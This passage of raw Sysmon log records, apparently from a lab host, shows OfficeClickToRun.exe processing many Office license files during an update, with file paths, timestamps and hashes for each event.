Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_Grace-ul-oob.xrm-msMD5=02D441E8E0C4D8FCFD4D33796C6D49CF,SHA256=69FBB1A2AF40B880536D44E67A093363A5BECEAAC49E84B8A2D1D530D8AD8D82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_Grace-ppd.xrm-msMD5=7C5F309747CB80ABF798B20047876715,SHA256=49514B951A258AA7F454AB3FC7A29768EB2A3F160D1422F1613CBD6887A9EF21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019VL_MAK_AE-ul-phn.xrm-msMD5=D654F1170B7873ED5FDEC4957B89B4FB,SHA256=F2944E1FECD5ECA3468F8F7E5CF71B6B461F9D534A5CD59D28A2E85F2EA7898E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019VL_MAK_AE-ul-oob.xrm-msMD5=6ADEB11687F8CA3548F375D640E17283,SHA256=C8BA6E30393AEB8260595444623A066071DDCD58ED9DA558EFF186AA0959D090,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019VL_MAK_AE-ppd.xrm-msMD5=E8798420175DF68C4434952B9D15DEC0,SHA256=496D38F342B5FFC7E9B4C2D8F76641671F40DF26F63CC8F4CB2563BD10DED45E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019VL_MAK_AE-pl.xrm-msMD5=1E24B5E2992385A8D472F4FDB507BD3F,SHA256=64D2CABBFB75DE556CEC818EE09FE6BA6C914B3B8434E7E89998F0C4C86921CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019VL_KMS_Client_AE-ul.xrm-msMD5=6BCA9E32BB230EF35065C73EF47505E8,SHA256=407CFB0F94DBD342B624C109574B7EBF6E240ADD7699803D4B6120568E1952F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=0CD878BDE46934B845643AF219A5EF1E,SHA256=B46E0307D023A28FDE81A52F52848E77682815EE875A7653EA7827CFFFBE1D70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019VL_KMS_Client_AE-ppd.xrm-msMD5=41A14F48DC9DDFF289FD580069620DE9,SHA256=C17EBCDEA370A81150A98AEF8F6E58DFFDE774555AF6725E40610EB4BF539EDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_Trial-ul-oob.xrm-msMD5=49045EE5B7AF9C02A12154162B64910D,SHA256=6D806F19030D3F558C822A3276D0ED2FAFEFD992DDB55B0DC9F472CB95BD7D67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_Trial-ppd.xrm-msMD5=5A1996BC4EDFE27CD8097B7E74C1FBA1,SHA256=874C8B19EACF01BEE6671897FDFD15CE2F0A75E835019719EA2957EC21584EB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_Trial-pl.xrm-msMD5=408A60691642172BF3C00A7A7ACCCD99,SHA256=EFF9587EF44BD4C8710678D220FAD64C6F7CE5D2A0D7A87139336ECD8827D489,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_Retail-ul-phn.xrm-msMD5=AA9011D2D63D42092E85F683A348DDFA,SHA256=E1B219DA55EAD93E340A4A8D60DDBA8DA3CA03F5BF7E54CA72BFC6BD6ACA8A43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_Retail-ul-oob.xrm-msMD5=DF1C7C20F48B08564533A87E2F2BFA30,SHA256=17DE12944603731DC3F4443FBC41428EAAFD8E603F60AC6E07EFC7D4676EF547,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_Retail-ppd.xrm-msMD5=FC2CEE28F705971B6926312BD516E81B,SHA256=6F14CC2F42297D7DEF7A216B7DBC2FEDF741C5CAABDA89A5FA88C79938626179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_Retail-pl.xrm-msMD5=818DDB2790F4DCF325C39B374DE7E47B,SHA256=4F12760D36CF196F751E453E558A1999A1EFDF2683E0D6065CDF9E039F8A7101,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_OEM_Perp-ul-phn.xrm-msMD5=E486B9885BF8725209089ECE30BB0123,SHA256=49AE5ACA8EE15DF2697DC9B3A2B8557CF9110388A0754DBAF3A5C3409C5CEAB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_OEM_Perp-ul-oob.xrm-msMD5=A5E1C740162F9B3C8D7977DD568759DF,SHA256=10C638406E58DB830E5A581D4A9D2B3E00D30D2DA9B055C345EF7DC55F206E3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_OEM_Perp-ppd.xrm-msMD5=58EBB8BCFFC400CE062A178A56F1B443,SHA256=0FD650DDB07FB23DB8EA3E0DEC16E0D574448743577D95F9E5388C900A4F14F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_OEM_Perp-pl.xrm-msMD5=679A39618E699B5DF0D15AA9D42C0A50,SHA256=41DAD3DC36070EB0BFEC8C379E5E4706E8C5AABF7F780352C1525F1B91AE2564,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_Grace-ul-oob.xrm-msMD5=6477683BD1C33016C1AAAA68EA37A157,SHA256=0A3693EF4EAF4A16AD6A0154C7A0A6652E06088809B82E2D243642A19FE9743C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPoint2019R_Grace-ppd.xrm-msMD5=7DCF711EA9CF49A8C8D87E813E00BC5D,SHA256=D5D693875A4CF613F8FC0D38F1F2D7EA5B3E921B6368B74D8DAD3C7D7C1C9102,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\pkeyconfig-office.xrm-msMD5=0BF7335CBB575B762C212C30F8932387,SHA256=B203912EE7F7E2DF69D79D5CE29DB4A3DF0A185598986259AC849A39A56F715D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\pkeyconfig-office-client15.xrm-msMD5=B7786A85291AB8B736718BE0BDB8C8E8,SHA256=12321543ED69DE70DE79CF9066AE68160F8D4375FF8DEA1360AE1E41FBE7F357,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_Trial-ul-oob.xrm-msMD5=D92BAD91F795C35C3171B4C2A786D24D,SHA256=37E4D0BE543C58ADC63C474752103CC83E69EE9EF2D6EDCAE10B66FE6FEC404F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_Trial-ppd.xrm-msMD5=9CABDDAEFF2D103C5C35370DF7FC8A73,SHA256=5D240D1451FC6FAE893D6F4C1499A40478523EC6DFE9F7341C30A665C09CB549,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_Trial-pl.xrm-msMD5=BBE97AF3E40BD0978DE816DA3F01E78E,SHA256=B1D13AD3E865FB81588822DDCF6392BA61746D70B08219DD14AE74642B257A6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_Retail-ul-phn.xrm-msMD5=F4B7213733A7A38921D960ABEE1605C5,SHA256=4CAFA375EE8A61330DB14027EAAE9D0EA0321D6037634793005297B3A605F6AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_Retail-ul-oob.xrm-msMD5=50171E17ABD48629B81BD477A9A92895,SHA256=34F1293EFCDF17388E2B3A4976B52E6EE308CEA21E3D63DF2875229AAF900E59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_Retail-ppd.xrm-msMD5=C16D3541F863287FDD7B85CAC35B509F,SHA256=3B58C426066775445F485D56E31E24948593B8A7E9E576E6149C6521A7AD1114,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_Retail-pl.xrm-msMD5=48B247FE2A7A3455CE62E183CCF32314,SHA256=8F82AC4CA1B42A1E3E5CD0D772AEDC276B27613915E07DA79EA391D4DF6DE674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_OEM_Perp-ul-phn.xrm-msMD5=62C2D78ACF6276D6CC07A8ADEF55C7B0,SHA256=AC2C194AD2F78AB7252790D90791E8A8516E72220340C760350FFC8B53221967,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_OEM_Perp-ul-oob.xrm-msMD5=ABACA6B376B4D55AAAC1AA0B784232C8,SHA256=C7325536EB85308F3716AEF2C66D59A1EFCC0F718E0C4C049530AEFFF11920BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_OEM_Perp-ppd.xrm-msMD5=77FF97F6580E9855A2FEEE04B0B82361,SHA256=BED4A42BACF24530D1A919F18B9B2FFB719CC5CE701DC63865396633AD9C04DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_OEM_Perp-pl.xrm-msMD5=39D9AAFC395F4DC5B15C8F019D5A8570,SHA256=CA9503486761118A96081EE0A8FC8A66776A9E929EAD3D0AE1C7A3BDFEFFD08F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_Grace-ul-oob.xrm-msMD5=BF83A9ABBD59E5619C984C01F3D2D1C6,SHA256=DCF0877842240C4F15271493FA7B46B92AA98F7C54B6BB2282FB0F348569BFED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalR_Grace-ppd.xrm-msMD5=341F8FA1E4284C0979F2A0BEFEA96179,SHA256=9F3342696383B0ED20BA59DF1F9F171DC6D86B152F2C6D2C960D41015A64D2B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalPipcR_OEM_Perp-ul-phn.xrm-msMD5=BDE74F3F137855CE225F7D467CEC4DB2,SHA256=CCB41BF90CB7004F06A3A1CB5B3FBFCA4BFCB7F80BCCFA378565F77209A6C111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalPipcR_OEM_Perp-ul-oob.xrm-msMD5=3EB9A7AD566B2A39809F753AF121B207,SHA256=EBEC5AFD12A3EA30A505F8C8DC67389BCA6CA6E74C492453C06794AA4769AB19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalPipcR_OEM_Perp-ppd.xrm-msMD5=A4F6A5B51827701B77EB6899418CB0FF,SHA256=A5AD0090D7CC499B84D5B53AE0DFD15755617B5D0DE09BCF59A3135C7D34919C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalPipcR_OEM_Perp-pl.xrm-msMD5=EBE2E4464E463B0BC1BA8C22C60169EE,SHA256=FE43537E190ADCCC39382E9082F241A3D4D4B409CFFFBD9B8D8B7EC0EB4EDB02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalPipcR_Grace-ul-oob.xrm-msMD5=3BA513354430BAA9984349B1BB9D2A83,SHA256=0F91EFDE28F0F3242D24A0968D0A6902F735D578F5A5E19D62C838E51F6D9D7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalPipcR_Grace-ppd.xrm-msMD5=A575C199ECF079E3374ADB5CBAD58BB5,SHA256=0DC143E2D79DA842F90D65A4FCF5118CCFDF2AEA5C6CD822A19BB371A6E41296,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PersonalPipcDemoR_BypassTrial365-ul-oob.xrm-msMD5=C90DAB0177123BF328C27AF301E79510,SHA256=A4E16D914D9781C421954200EBB7A88FE211714F0407B045B149B687D7F055F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 